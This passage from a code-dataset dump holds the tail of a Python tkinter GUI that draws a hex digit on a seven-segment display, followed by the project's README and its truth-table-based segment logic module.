INITIAL_CAN_WIDTH = 250\n INITIAL_CAN_HEIGHT = 300\n HILITE_PAD = 0\n # add\n BAD_USER_INPUT = -1\n MIN_NUM = 0\n MAX_NUM = 15\n\n # constructor\n def __init__(self, master_root=None):\n # our member to support the ssl\n self.sev_seg_logic = ssl.SevenSegmentLogic()\n # define digit to display that can be overwritten by user\n self.digit_to_show = self.INITIAL_DIG\n\n # set up mutable width and height for resizing\n self.canvas_width = self.INITIAL_CAN_WIDTH\n self.canvas_height = self.INITIAL_CAN_HEIGHT\n\n # -------------- store root reference locally --------------\n if not self.set_root(master_root):\n stand_in = tk.Tk()\n self.set_root(stand_in)\n\n # --------- a container frame and subframes ----------------\n self.container = tk.Frame(self.root, bg=\"ghostwhite\", padx=10, pady=10)\n self.title_frame = tk.Frame(self.container, bg=\"ghostwhite\")\n self.work_frame = tk.Frame(self.container, bg=\"ghostwhite\")\n self.canvas_frame = tk.Frame(self.container, bg=\"gray3\", padx=3, pady=3)\n\n # -------------- one message widget ------------------------\n header = \"Enter a hex digit to display (0-9, A-F)\"\n self.msg_head = tk.Message(self.title_frame, text=header)\n self.msg_head.config(font=(\"Helvetica Neue\", 11), bg=\"ghostwhite\",\n width=300)\n\n # ----------------- some label widgets ------------------\n self.lab_digit = tk.Label(self.work_frame, text=\"Digit:\", padx=20,\n pady=10, bg=\"ghostwhite\")\n\n # ----------------- some entry widgets ------------------\n self.enter_digit = tk.Entry(self.work_frame)\n self.enter_digit.insert(0, str(self.digit_to_show))\n # add\n # Binding the self.update_canvas event handler to a <Return> event in\n # the entry field.\n self.enter_digit.bind(\"<Return>\", self.update_canvas)\n\n # ----------------- the canvas widget ------------------\n self.canvas = tk.Canvas(self.canvas_frame, width=self.canvas_width,\n height=self.canvas_height, bg=\"gray3\",\n highlightthickness=self.HILITE_PAD)\n\n # ------- place widgets using pack and grid layout ---------\n self.container.pack(expand=True, fill=tk.BOTH)\n self.canvas_frame.pack(side=\"right\", expand=True, fill=tk.BOTH)\n self.title_frame.pack(expand=True, fill=tk.BOTH)\n self.work_frame.pack(expand=True, fill=tk.BOTH)\n 
self.canvas.pack(expand=True, fill=tk.BOTH)\n self.msg_head.pack(expand=True, fill=tk.BOTH)\n\n self.lab_digit.grid(row=0, column=0, sticky=tk.E)\n self.enter_digit.grid(row=0, column=1, sticky=tk.W)\n\n # -- update dimensions when resized (including 1st time) --\n self.canvas.bind(\"<Configure>\", self.resize_can)\n\n # mutators\n def set_root(self, rt):\n if self.valid_tk_root(rt):\n self.root = rt\n return True\n # else\n return False\n\n def set_title(self, title):\n if type(title) == str:\n self.root.title = title\n return True\n # else\n return False\n\n # accessor\n def get_root(self):\n return self.root\n\n # static helper\n @staticmethod\n def valid_tk_root(am_i_a_root):\n if type(am_i_a_root) == tk.Tk:\n return True\n # else\n return False\n\n # bound event handler gets new dimensions and redraws when resized\n def resize_can(self, event):\n # without 2 * hi-light pad, get runaway window\n self.canvas_width = float(event.width) - (2 * self.HILITE_PAD)\n self.canvas_height = float(event.height) - (2 * self.HILITE_PAD)\n\n # change the size, then redraw everything (alt: Canvas's scale())\n self.canvas.configure(width=self.canvas_width, height=self.canvas_height)\n self.update_canvas()\n\n @classmethod\n def convert_hex_char_to_int(cls, input_val):\n try:\n if type(input_val) is not str or len(input_val) != 1:\n return cls.BAD_USER_INPUT\n ret_int = int(input_val, 16)\n except ValueError:\n return cls.BAD_USER_INPUT\n else:\n return ret_int\n\n @classmethod\n def valid_input(cls, input_val):\n if not (cls.MIN_NUM <= input_val <= cls.MAX_NUM):\n return False\n return True\n\n # canvas updater\n def update_canvas(self, *args):\n self.canvas.delete(\"all\")\n CLICK = .02\n CAP = .0175\n LEN = .3\n TL_X = .35\n TL_Y = .15\n SLANT = .04 # range that looks fair: 0.0 - 0.07)\n\n # for a shorter xy_func_list[] definition\n vert_func = self.draw_vert_seg\n horiz_func = self.draw_horiz_seg\n\n # list consisting of (x, y, function) for each segment a - g\n xy_func_list = [\n # seg a\n (TL_X + CLICK, TL_Y, horiz_func),\n # seg b\n (TL_X + LEN + 2 * CAP + 2 * CLICK, TL_Y, vert_func),\n # seg c\n (TL_X - SLANT + LEN + (2. * CAP) + (2. * CLICK),\n TL_Y + LEN + (2. * CAP), vert_func),\n # seg d\n (TL_X - (2 * SLANT) + CLICK, TL_Y + (2 * LEN) + (4 *\n CAP), horiz_func),\n # seg e\n (TL_X - SLANT, TL_Y + LEN + (2. * CAP), vert_func),\n # seg f\n (TL_X, TL_Y, vert_func),\n # seg g\n (TL_X - SLANT + CLICK, TL_Y + LEN + (2. 
* CAP), horiz_func)\n ]\n\n simulated_user_str = self.enter_digit.get()\n # convert from hex to int\n user_int = self.convert_hex_char_to_int(simulated_user_str)\n\n # SSL turns any error/exception into \"E\" for display,\n # so out-of-range ints that pass above will be displayed as \"E\"\n if not self.valid_input(user_int):\n # Show Error Message\n tkmb.showerror(\"Input Error\", \"Single (Hex) Digits (as a string) \"\n \"Only, Please.\")\n self.sev_seg_logic.eval(14)\n\n # else if it is in range\n elif self.valid_input(user_int):\n self.sev_seg_logic.eval(user_int)\n\n # draw each segment using draw() method in xy_func_list[k][2]()\n for k in range(7):\n if self.sev_seg_logic.get_val_of_seg(k):\n xy_func_list[k][2](xy_func_list[k][0], xy_func_list[k][1], LEN,\n CAP, SLANT)\n\n def draw_vert_seg(self, x, y, length, end, slant):\n # tall, narrow hexagon\n points = [x * self.canvas_width, y * self.canvas_height, (x - end) * self.canvas_width,\n (y + end) * self.canvas_height, (x - end - slant) * self.canvas_width,\n (y + end + length) * self.canvas_height, (x - slant) * self.canvas_width,\n (y + length + (2 * end)) * self.canvas_height,\n (x + end - slant) * self.canvas_width, (y + end + length) * self.canvas_height,\n (x + end) * self.canvas_width, (y + end) * self.canvas_height]\n self.canvas.create_polygon(points, fill=\"orange red\", width=0)\n\n def draw_horiz_seg(self, x, y, length, end, dummy=None):\n \"\"\" last param is to make signature match draw_vert_seg()\n for next phase -- horiz segs don\"t have slants \"\"\"\n # long, thin hexagon\n points = [x * self.canvas_width, y * self.canvas_height, (x + end) * self.canvas_width,\n (y + end) * self.canvas_height, (x + end + length) * self.canvas_width,\n (y + end) * self.canvas_height, (x + length + (2 * end)) * self.canvas_width,\n y * self.canvas_height, (x + end + length) * self.canvas_width,\n (y - end) * self.canvas_height, (x + end) * self.canvas_width,\n (y - end) * self.canvas_height]\n self.canvas.create_polygon(points, fill=\"orange red\", width=0)\n\n\n# ============================== End Of SevenSegmentGUI Class ==============================\n\n# ====================================== Main Program ======================================\n\nif __name__ == \"__main__\":\n main()\n" }, { "alpha_fraction": 0.5578747391700745, "alphanum_fraction": 0.7115749716758728, "avg_line_length": 19.269229888916016, "blob_id": "5f81a19d03b9a3b374b6ac5141697a6e9d17ec37", "content_id": "c42c55ac84e08c03f09ebbf93520ad9035ffabd1", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 533, "license_type": "no_license", "max_line_length": 121, "num_lines": 26, "path": "/README.md", "repo_name": "jsmlau/seven-segment-display-gui", "src_encoding": "UTF-8", "text": "## Welcome 👋\n> Seven Segment Display GUI\n\n## Prerequisite\nYou may need to install **tkinter**</br>\n\n```sh\nsudo apt-get install python3-tk\n```\n\n## Usage\n\n```sh\npython3 seven_segment_display_gui.py\n```\n## Result\n![segs_gui_01](https://user-images.githubusercontent.com/37385743/89004583-5c715200-d2b7-11ea-9ba9-686b57138e5b.png)</br>\n![segs_gui_02](https://user-images.githubusercontent.com/37385743/89004590-5f6c4280-d2b7-11ea-81a3-0a2c00f951a9.png)\n\n## Author\n\n👤 **Jas Lau**\n\n* Github: [@jsmlau](https://github.com/jsmlau)\n\n***\n" }, { "alpha_fraction": 0.5133110880851746, "alphanum_fraction": 0.524501383304596, "avg_line_length": 34.51602554321289, "blob_id": "1bd3804935dd3329ee472cec58cc6240aa6c3159", 
"content_id": "288f0430c98094ea1824dec59115a847172a16df", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 11081, "license_type": "no_license", "max_line_length": 82, "num_lines": 312, "path": "/seven_segment_logic.py", "repo_name": "jsmlau/seven-segment-display-gui", "src_encoding": "UTF-8", "text": "import copy\nimport numpy as np\n\n\n# ====================== Client As A Function ======================\ndef main():\n my_7_seg = SevenSegmentLogic()\n my_12_seg = MultiSegmentLogic(12)\n\n print(\"As constructed -------------------\")\n print(my_7_seg)\n\n try:\n my_12_seg.set_num_segs(12) # should work\n my_7_seg.set_num_segs(8) # should \"throw\"\n except ValueError as err:\n print(\"\\nExpected ... \" + str(err) + \"\\n\")\n\n try:\n my_7_seg.eval(1)\n\n except AttributeError as err:\n print(\"\\nNot Expected... \" + str(err) + \"\\n\")\n\n print(\"\\nFrom 0 - 16: \\n\")\n for input_x in range(16):\n print(\"inputX = \", input_x)\n my_7_seg.eval(input_x)\n print(\"\\n| \", end='')\n for k in range(7):\n print(str(my_7_seg.get_val_of_seg(k)) + \" | \", end='')\n print()\n\n\n# ====================== End of Client As A Function ======================\n# ====================== BooleanFunc Class ======================\n\nclass BooleanFunc:\n # Static members and intended constants\n MAX_TABLE_SIZE = 65536 # that's 16 binary inputs\n MIN_TABLE_SIZE = 2 # that's 1 binary input\n MIN_VALUE = 0\n DEFAULT_TABLE_SIZE = 4\n DEFAULT_FUNC = DEFAULT_TABLE_SIZE * [False]\n\n # Initializer (\"constructor\") method -------------------\n def __init__(self, table_size=None, defining_list=None,\n eval_return_if_error=False):\n \"\"\"\n Args:\n table_size:\n defining_list:\n eval_return_if_error:\n \"\"\"\n if not table_size and not defining_list:\n # passed neither list nor size\n table_size = self.DEFAULT_TABLE_SIZE\n defining_list = self.DEFAULT_FUNC\n elif table_size and not defining_list:\n # passed size but no list\n self.valid_table_size(table_size) # raises, no return\n defining_list = table_size * [False]\n elif not table_size:\n # passed list but no size\n self.valid_defining_list(defining_list) # raises, no return\n table_size = len(defining_list)\n else:\n # passed both list and size\n self.valid_defining_list(defining_list)\n if len(defining_list) != table_size:\n raise ValueError(\"Table size does not match list length\"\n \" in constructor.\")\n # sanitize bools (e.g. (1.32, \"hi\", -99)->True, (0.0, \"\", # 0)->False)\n eval_return_if_error = bool(eval_return_if_error)\n defining_list = [bool(item) for item in defining_list]\n\n # assign instance members\n self.eval_return_if_error = eval_return_if_error\n self.state = eval_return_if_error\n self.table_size = table_size\n self.truth_table = np.array(defining_list, dtype=bool)\n\n def set_truth_table_using(self, rarer_value, inputs_that_produce_rarer_val):\n \"\"\"Allow the client to mutate the truth table (without changing the\n size, whose immutability we preserve from our original design). 
\"\"\"\n if not (self.MIN_VALUE <= len(inputs_that_produce_rarer_val) <=\n self.table_size):\n return False\n # initialize with inputs_that_produce_rarer_val\n if rarer_value is True:\n self.initialize_table(False)\n\n elif rarer_value is False:\n self.initialize_table(True)\n\n # set the rarer value\n for i in range(len(inputs_that_produce_rarer_val)):\n the_num = inputs_that_produce_rarer_val[i]\n if self.valid_input(the_num):\n self.truth_table[the_num] = rarer_value\n return True\n\n # Mutator -------------------------------\n def eval(self, input_val):\n \"\"\"a mutator for the state attribute based on the an input integer\"\"\"\n if not (self.valid_input(input_val)):\n self.state = self.eval_return_if_error\n return\n # else\n self.state = self.truth_table[input_val]\n return self.state\n\n # Accessor -------------------------------\n def get_state(self):\n return self.state\n\n # Stringizer -------------------------------\n def __str__(self):\n ret_str = \"truth_table: \" + str(self.truth_table) + \"\\nsize = \" + str(\n self.table_size) + \"\\nerror return = \" + str(\n self.eval_return_if_error) + \"\\ncurrent state = \" + str(\n self.state) + \"\\n\"\n return ret_str\n\n # Helper\n @classmethod\n def valid_table_size(cls, size):\n if not isinstance(size, int):\n raise TypeError(\"Table size must be an int.\")\n if not (cls.MIN_TABLE_SIZE <= size <= cls.MAX_TABLE_SIZE):\n raise ValueError(\"Bad table size passed to constructor\"\n \" (legal range: {}-{}).\".format(cls.MIN_TABLE_SIZE,\n cls.MAX_TABLE_SIZE))\n # else\n return True\n\n @classmethod\n def valid_defining_list(cls, the_list):\n if not isinstance(the_list, list):\n raise ValueError(\"Bad type in constructor. defining_list must be\"\n \" type list.\")\n if not (cls.MIN_TABLE_SIZE <= len(the_list) <= cls.MAX_TABLE_SIZE):\n raise ValueError(\"Bad list passed to constructor\"\n \" (its length is outside legal range: {}-{\"\n \"}).\".format(cls.MIN_TABLE_SIZE,\n cls.MAX_TABLE_SIZE))\n # else\n return True\n\n def initialize_table(self, initial_val):\n for i in range(self.table_size):\n self.truth_table[i] = initial_val\n\n def valid_input(self, eval_input):\n if not isinstance(eval_input, int):\n return False\n if not (self.MIN_VALUE <= eval_input < self.table_size):\n return False\n return True\n\n\n# ====================== End Of BooleanFunc Class ======================\n\n# ======================= MultiSegmentLogic Class =======================\n\nclass MultiSegmentLogic:\n # Static members and intended constants\n MAX_SEGS = 7\n MIN_SEGS = 0\n DEFAULT_SEGS = 7\n DEFAULT_NUM_SEGS = 0\n\n # Initializer (\"constructor\") method -------------------\n def __init__(self, num_segs=DEFAULT_NUM_SEGS):\n self.segs = []\n if not self.set_num_segs(num_segs):\n self.num_segs = self.DEFAULT_NUM_SEGS\n self.num_segs = num_segs\n self.segs = [BooleanFunc(num_segs) for i in range(num_segs)]\n\n # Mutator -------------------------------\n def set_num_segs(self, num_segs):\n if not self.check_empty_segs(num_segs):\n return False\n # else\n del self.segs\n self.segs = [BooleanFunc(num_segs) for i in range(num_segs)]\n self.num_segs = num_segs\n return True\n\n def set_segment(self, seg_num, func_for_this_seg):\n # deep copy of func_for_this_seg\n if not self.valid_num_segs(seg_num):\n return False\n # else\n self.segs[seg_num] = copy.deepcopy(func_for_this_seg)\n return True\n\n # Accessor -------------------------------\n def get_val_of_seg(self, seg_num):\n if not isinstance(seg_num, int):\n return False\n if not (self.MIN_SEGS <= seg_num 
< self.MAX_SEGS):\n return False\n return self.segs[seg_num].state\n\n def eval(self, input):\n for i in range(self.num_segs):\n try:\n self.segs[i].eval(input)\n if self.segs[i] is None:\n raise AttributeError\n except AttributeError:\n print(\"Attribute Error\")\n\n @classmethod\n def check_empty_segs(cls, num_segs):\n if num_segs < cls.DEFAULT_NUM_SEGS:\n return False\n return True\n\n # helper\n def valid_num_segs(self, segs_num):\n if not (self.MIN_SEGS <= segs_num < self.num_segs):\n return False\n return True\n\n def __str__(self):\n ret_str = \"segs: \"\n ret_str += str(self.segs[0])\n ret_str += str(self.segs[1])\n ret_str += str(self.segs[2])\n ret_str += str(self.segs[3])\n ret_str += str(self.segs[4])\n ret_str += str(self.segs[5])\n ret_str += str(self.segs[6])\n ret_str += \"\\nnum segs = \" + str(self.num_segs)\n return ret_str\n\n\n# ======================== End Of MultiSegmentLogic Class ========================\n\n# ============================ SevenSegmentLogic Class ===========================\n\nclass SevenSegmentLogic(MultiSegmentLogic):\n # Initializer (\"constructor\") method -------------------\n def __init__(self):\n # call base class\n super(SevenSegmentLogic, self).__init__(7)\n self.load_boolean_func_for_each_segment()\n\n # override to base class method\n def set_num_segs(self, num_segs):\n if num_segs != 7:\n raise ValueError(\"Number of segments is not 7!\")\n # else\n # chain to base class method\n super(SevenSegmentLogic, self).set_num_segs(num_segs)\n\n # helper\n def load_boolean_func_for_each_segment(self):\n # instantiate BooleanFunc of segment_A to segment_G\n segment_a = BooleanFunc(16)\n segment_b = BooleanFunc(16)\n segment_c = BooleanFunc(16)\n segment_d = BooleanFunc(16)\n segment_e = BooleanFunc(16)\n segment_f = BooleanFunc(16)\n segment_g = BooleanFunc(16)\n # set up a flag to determine if the segment rules have been set up\n self.funcs_previously_defined = False\n\n if not self.funcs_previously_defined:\n # rules of segment A-G\n a_func = [1, 4, 11, 13]\n b_func = [5, 6, 11, 12, 14, 15]\n c_func = [2, 12, 14, 15]\n d_func = [1, 4, 7, 9, 10, 15]\n e_func = [1, 3, 4, 5, 7, 9]\n f_func = [1, 2, 3, 7, 13]\n g_func = [0, 1, 7, 12]\n\n # use False as rare_value to set up the truth table.\n segment_a.set_truth_table_using(False, a_func)\n segment_b.set_truth_table_using(False, b_func)\n segment_c.set_truth_table_using(False, c_func)\n segment_d.set_truth_table_using(False, d_func)\n segment_e.set_truth_table_using(False, e_func)\n segment_f.set_truth_table_using(False, f_func)\n segment_g.set_truth_table_using(False, g_func)\n self.funcs_previously_defined = True\n\n self.set_segment(0, segment_a)\n self.set_segment(1, segment_b)\n self.set_segment(2, segment_c)\n self.set_segment(3, segment_d)\n self.set_segment(4, segment_e)\n self.set_segment(5, segment_f)\n self.set_segment(6, segment_g)\n\n def valid_num_segs(self, segs_num):\n if not (self.MIN_SEGS <= segs_num < self.MAX_SEGS):\n return False\n return True\n\n\n# ============================= End Of SevenSegmentLogic Class ===================\n\n# ================================== Main Program ================================\n\nif __name__ == \"__main__\":\n main()\n" } ]
3
ML-ZimingMeng/Study-Notes
https://github.com/ML-ZimingMeng/Study-Notes
642d5bece9c70a6f1465f9ad44745eebe2dd3d99
f8bd3ef76f455d0ae34d87bd9d0cd1397035e873
1844b98c94cf475877d039032a30ed644509a034
refs/heads/master
2020-09-27T23:06:47.959323
2020-03-01T05:26:34
2020-03-01T05:26:34
226,631,539
1
1
null
null
null
null
null
[ { "alpha_fraction": 0.807692289352417, "alphanum_fraction": 0.807692289352417, "avg_line_length": 25, "blob_id": "f6262c8cdc5fab535356499a779e481e1063bd70", "content_id": "4d6d2ff78b5d2c74aa490e3ad9097a0732af8a6f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 52, "license_type": "no_license", "max_line_length": 37, "num_lines": 2, "path": "/README.md", "repo_name": "ML-ZimingMeng/Study-Notes", "src_encoding": "UTF-8", "text": "# Study-Notes\nMy study notes about machine learning\n" }, { "alpha_fraction": 0.7080554366111755, "alphanum_fraction": 0.7249871492385864, "avg_line_length": 31.63793182373047, "blob_id": "565c391290990212d4b2392f445d608cd40e686d", "content_id": "b3117a8ca3a9e62d81efccfbf8ce1ba238479366", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1949, "license_type": "no_license", "max_line_length": 91, "num_lines": 58, "path": "/TensorFlow/Mini-batch/distrubute_to_linear/quiz.py", "repo_name": "ML-ZimingMeng/Study-Notes", "src_encoding": "UTF-8", "text": "from tensorflow.examples.tutorials.mnist import input_data\r\nimport tensorflow as tf\r\nimport numpy as np\r\nfrom helper import batches\r\n\r\nlearning_rate = 0.001\r\nn_input = 784 # MNIST data input (img shape: 28*28)\r\nn_classes = 10 # MNIST total classes (0-9 digits)\r\n\r\n# Import MNIST data\r\nmnist = input_data.read_data_sets('/datasets/ud730/mnist',one_hot=True)\r\n\r\n# The features are already scaled and the data is shuffled\r\ntrain_features = mnist.train.images\r\ntest_features = mnist.test.images\r\n\r\ntrain_labels = mnist.train.labels.astype(np.float32)\r\ntest_labels = mnist.test.labels.astype(np.float32)\r\n\r\n# Features and Labels\r\nfeatures = tf.placeholder(tf.float32,[None,n_input])\r\nlabels = tf.placeholder(tf.float32,[None,n_classes])\r\n\r\n# Weights & bias\r\nweights = tf.Variable(tf.random_normal([n_input,n_classes]))\r\nbias = tf.Variable(tf.random_normal([n_classes]))\r\n\r\n# Logits - xW + b\r\nlogits = tf.add(tf.matmul(features,weights),bias)\r\n\r\n# Define loss and optimizer\r\ncost = tf.reduce_mean(tf.nn.softmax_cross_entropy_with_logits(logits=logits,labels=labels))\r\noptimizer = tf.train.GradientDescentOptimizer(learning_rate=learning_rate).minimize(cost)\r\n\r\n# Calculate accuracy\r\ncorrect_prediction = tf.equal(tf.argmax(logits,1),tf.argmax(labels,1))\r\naccuracy = tf.reduce_mean(tf.cast(correct_prediction,tf.float32))\r\n\r\n# TODO: Set batch size\r\nbatch_size = 128\r\nassert batch_size is not None,'You must set the batch size'\r\n\r\ninit = tf.global_variables_initializer()\r\n\r\nwith tf.Session() as sess:\r\n sess.run(init)\r\n\r\n # TODO: Train optimizer on all batches\r\n for batch_features,batch_labels in batches(batch_size,train_features,train_labels):\r\n sess.run(optimizer,feed_dict={features:batch_features,labels:batch_labels})\r\n\r\n # Calculate accuracy for test dataset\r\n test_accuracy = sess.run(\r\n accuracy,\r\n feed_dict={features:test_features,labels:test_labels}\r\n )\r\n\r\nprint('Test Accuracy:{}'.format(test_accuracy))" }, { "alpha_fraction": 0.5205327272415161, "alphanum_fraction": 0.6026636958122253, "avg_line_length": 22.405405044555664, "blob_id": "e899ee9a35b275b664b5eee078e40c9bb6cb9391", "content_id": "291f366b35f82fbf6a43dc4b414d59c1e8c9ea44", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 923, "license_type": "no_license", "max_line_length": 83, "num_lines": 37, 
"path": "/TensorFlow/tf_Dropout.py", "repo_name": "ML-ZimingMeng/Study-Notes", "src_encoding": "UTF-8", "text": "import tensorflow as tf\r\n\r\nhidden_layer_weights = [\r\n [0.1,0.2,0.4],\r\n [0.4,0.6,0.6],\r\n [0.5,0.9,0.1],\r\n [0.8,0.2,0.8]]\r\nout_weights = [\r\n [0.1,0.6],\r\n [0.2,0.1],\r\n [0.7,0.9]]\r\n\r\nweights = [\r\n tf.Variable(hidden_layer_weights),\r\n tf.Variable(out_weights)\r\n]\r\nbiases = [\r\n tf.Variable(tf.zeros(3)),\r\n tf.Variable(tf.zeros(2))\r\n]\r\n\r\n# Input\r\nfeatures = tf.Variable([[0.0,2.0,3.0,4.0],[0.1,0.2,0.3,0.4],[11.0,12.0,13.0,14.0]])\r\n\r\n# Create Model with Dropout\r\nkeep_prob = tf.placeholder(tf.float32)\r\nlayer = tf.add(tf.matmul(features,weights[0]),biases[0])\r\nlayer = tf.nn.relu(layer)\r\nlayer = tf.nn.dropout(layer,keep_prob)\r\n\r\nlogits = tf.add(tf.matmul(layer,weights[1]),biases[1])\r\n\r\n# Print logtis from a session\r\n# 初始化\r\nwith tf.Session() as sess:\r\n sess.run(tf.global_variables_initializer())\r\n print(sess.run(logits,feed_dict={keep_prob:0.5}))# 在此设置keep_prob参数也行" }, { "alpha_fraction": 0.624790608882904, "alphanum_fraction": 0.6264656782150269, "avg_line_length": 27.850000381469727, "blob_id": "c714be301d8f23b4e87e7307719c97d9d5f2fc63", "content_id": "64648bdc2ddcc67c97052662e713f6edf9b85c68", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 597, "license_type": "no_license", "max_line_length": 67, "num_lines": 20, "path": "/TensorFlow/Mini-batch/sandbox/quiz_sandbox.py", "repo_name": "ML-ZimingMeng/Study-Notes", "src_encoding": "UTF-8", "text": "import math\r\ndef batches(batch_size,features,labels):\r\n \"\"\"\r\n Create batches of features and labels\r\n :param batch_size: The batch size\r\n :param features: List of features\r\n :param babels: List of labels\r\n :return: Batches of (Features,Labels)\r\n \"\"\"\r\n assert len(features) == len(labels)\r\n\r\n # implement batching\r\n output_batches = []\r\n\r\n for start_i in range(0,len(features),batch_size):\r\n end_i = start_i + batch_size\r\n batch = [[features[start_i:end_i]],[labels[start_i:end_i]]]\r\n output_batches.append(batch)\r\n\r\n return output_batches\r\n" }, { "alpha_fraction": 0.6508108377456665, "alphanum_fraction": 0.6518918871879578, "avg_line_length": 26.090909957885742, "blob_id": "6636263e3fc99a557acfa5291d8d6123d40caec2", "content_id": "17d92d2e45213ea551fcf7cd19e855b120cf7af4", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1063, "license_type": "no_license", "max_line_length": 66, "num_lines": 33, "path": "/TensorFlow/Linear algebra/quiz.py", "repo_name": "ML-ZimingMeng/Study-Notes", "src_encoding": "UTF-8", "text": "import tensorflow as tf\r\n\r\ndef get_weights(n_features,n_labels):\r\n \"\"\"\r\n Return Tensorflow weights\r\n :param n_features: Number of features\r\n :param n_labels: Number of labels\r\n :return: Tensorflow weights\r\n \"\"\"\r\n # Return weights\r\n # 使用tf.Variable()返回可修改的权重,采用随机化,\r\n # 因此用正态分布tf.truncated_normal()\r\n return tf.Variable(tf.truncated_normal((n_features,n_labels)))\r\n\r\ndef get_biases(n_labels):\r\n \"\"\"\r\n Return Tensorflow bias\r\n :param n_labels: Number of labels\r\n :return: Tensorflow bias\r\n \"\"\"\r\n # 因为权重已经被随机化来帮助模型不被卡住,因此不需要再随机化偏差了,设为0.\r\n return tf.Variable(tf.zeros(n_labels))\r\n\r\ndef linear(input,w,b):\r\n \"\"\"\r\n Return linear function in Tensorflow\r\n :param input: Tensorflow input\r\n :param w: Tensorflow weights\r\n :param b: Tensorflow biases\r\n :return: 
TensorFlow linear function\r\n \"\"\"\r\n # 使用tf.matmul()函数进行矩阵乘法\r\n return tf.add(tf.matmul(input,w),b)" }, { "alpha_fraction": 0.4851228892803192, "alphanum_fraction": 0.5756791830062866, "avg_line_length": 20.735294342041016, "blob_id": "d837ce942d7c1230dc5d228598d6a6dd26d02554", "content_id": "c9d9d829138e0eeeddac77279c5270d90c114a92", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 779, "license_type": "no_license", "max_line_length": 87, "num_lines": 34, "path": "/TensorFlow/tf_relu.py", "repo_name": "ML-ZimingMeng/Study-Notes", "src_encoding": "UTF-8", "text": "import tensorflow as tf\r\n\r\noutput = None\r\nhidden_layer_weight = [\r\n [0.1,0.2,0.4],\r\n [0.4,0.6,0.6],\r\n [0.5,0.9,0.1],\r\n [0.8,0.2,0.8]]\r\nout_weights = [\r\n [0.1,0.6],\r\n [0.2,0.1],\r\n [0.7,0.9]]\r\n\r\nweights = [\r\n tf.Variable(hidden_layer_weight),\r\n tf.Variable(out_weights)\r\n]\r\nbiases = [\r\n tf.Variable(tf.zeros(3)),\r\n tf.Variable(tf.zeros(2))\r\n]\r\n\r\n# Input\r\nfeatures = tf.Variable([[1.0,2.0,3.0,4.0],[-1.0,-2.0,-3.0,-4.0],[11.0,12.0,13.0,14.0]])\r\n\r\n# Create Model\r\nhidden_layer = tf.nn.relu(tf.add(tf.matmul(features,weights[0]),biases[0]))\r\nlogits = tf.add(tf.matmul(hidden_layer,weights[1]),biases[1])\r\n\r\n# Print session results\r\n# 初始化\r\nwith tf.Session() as sess:\r\n sess.run(tf.global_variables_initializer())\r\n print(sess.run(logits))\r\n" }, { "alpha_fraction": 0.5971014499664307, "alphanum_fraction": 0.6202898621559143, "avg_line_length": 21.133333206176758, "blob_id": "7d35e73f24962c83d28537847aa724449e914c28", "content_id": "7d37a4ae016ef04c85f693b208d4432709bb1e51", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 355, "license_type": "no_license", "max_line_length": 65, "num_lines": 15, "path": "/TensorFlow/tf_softmax.py", "repo_name": "ML-ZimingMeng/Study-Notes", "src_encoding": "UTF-8", "text": "import tensorflow as tf\r\n\r\ndef run():\r\n output = None\r\n logits_data = [2.0,1.0,0.1]\r\n logits = tf.placeholder(tf.float32) # 使用非常量\r\n\r\n # Calculate the softamx of the logits\r\n\r\n softmax = tf.nn.softmax(logits)\r\n\r\n with tf.Session() as sess:\r\n output = sess.run(softmax,feed_dict={logits:logits_data})\r\n\r\n return output" }, { "alpha_fraction": 0.6447920799255371, "alphanum_fraction": 0.66806560754776, "avg_line_length": 30.787500381469727, "blob_id": "56e51c9923cef0ea5edbf042daf79738880b1769", "content_id": "518ab0eda4702f1741bc2bf5b44c4881b87a6e05", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3039, "license_type": "no_license", "max_line_length": 103, "num_lines": 80, "path": "/TensorFlow/multilayer_perceptron.py", "repo_name": "ML-ZimingMeng/Study-Notes", "src_encoding": "UTF-8", "text": "from tensorflow.examples.tutorials.mnist import input_data\r\n# 使用Tensorflow提供的MNIST数据集\r\nmnist = input_data.read_data_sets(\".\",one_hot=True,reshape=False)\r\n\r\nimport tensorflow as tf\r\n\r\n# 参数Parameters,可进行调整以改善模型\r\nlearning_rate = 0.001\r\ntraining_epochs = 20\r\nbatch_size = 128 # 如果没有足够内存,可适当降低\r\ndisplay_step = 1\r\n\r\nn_input = 784 # MNIST data input (img shape: 28*28)\r\nn_classes = 10 # MNIST total classes (0-9 digits)\r\n\r\n# 隐藏层参数Hidden Layer Parameters\r\n# n_hidden_layer 决定了神经网络隐藏层的带下。也被称作层的宽度。\r\nn_hidden_layer = 256 # 特征的层数\r\n\r\n# 权重和偏置项 Weights and Biases\r\n# 层权重和偏置项的储存\r\nweights = {\r\n 
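# 'hidden_layer': 输入层到隐藏层的权重;'out': 隐藏层到输出层的权重\r\n    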
'hidden_layer':tf.Variable(tf.random_normal([n_input,n_hidden_layer])),\r\n 'out':tf.Variable(tf.random_normal([n_hidden_layer,n_classes]))\r\n}\r\nbiases = {\r\n 'hidden_layer':tf.Variable(tf.random_normal([n_hidden_layer])),\r\n 'out':tf.Variable(tf.random_normal([n_classes]))\r\n}\r\n\r\n# 输入Input\r\nx = tf.placeholder(\"float\",[None,28,28,1])\r\ny = tf.placeholder(\"float\",[None,n_classes])\r\n\r\nx_flat = tf.reshape(x,[-1,n_input]) # 将29px*28px的矩阵转换成784px*1px的单行向量\r\n\r\n# 建立多层感知器Multilayer Perceptron\r\n# ReLU作为隐藏层激活函数\r\nlayer_1 = tf.add(tf.matmul(x_flat,weights['hidden_layer']),biases['hidden_layer'])\r\nlayer_1 = tf.nn.relu(layer_1)\r\n\r\n# 输出层的线性激活函数\r\nlogits = tf.add(tf.matmul(layer_1,weights['out']),biases['out'])\r\n\r\n# 定义误差值cost和优化器Optimizer\r\ncost = tf.reduce_mean(tf.nn.softmax_cross_entropy_with_logits(logits=logits,labels=y))\r\n# 这里采用了与Intro to Tensorflow lab相同的优化技术\r\noptimizer = 